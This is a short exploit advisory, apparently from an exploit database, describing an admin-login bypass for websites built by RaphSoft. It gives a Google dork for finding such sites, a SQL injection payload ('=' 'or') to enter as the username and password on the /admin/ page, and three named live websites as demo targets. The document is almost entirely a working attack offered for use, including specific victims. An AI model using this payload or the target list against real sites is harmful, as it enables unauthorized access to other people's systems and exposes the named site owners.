# Exploit Title :  RaphSoft Control Panel Bypass Admin Page Vulnerability
# Date : 2018-10-05
# Exploit Author : Iran Cyber Security Group
# Google Dork : "intext:Designed by RaphSoft"
# category : webapps
# Tested on : Win7 , Kali Linux


Proof of Concept : 

 search google Dork : "intext:Designed by RaphSoft"

Demo :
   Then Choose a Target and put this after URL : /admin/  
   And fill username and password like the information below : 

   Username : '=' 'or' 
   Password : '=' 'or' 

   http://www.johnsonmarkconstructs.com/admin/
   http://www.tombeyschool.com/admin/
   http://www.royalstridesecuritysystems.com/admin/
  
# Discovered by : Mr_null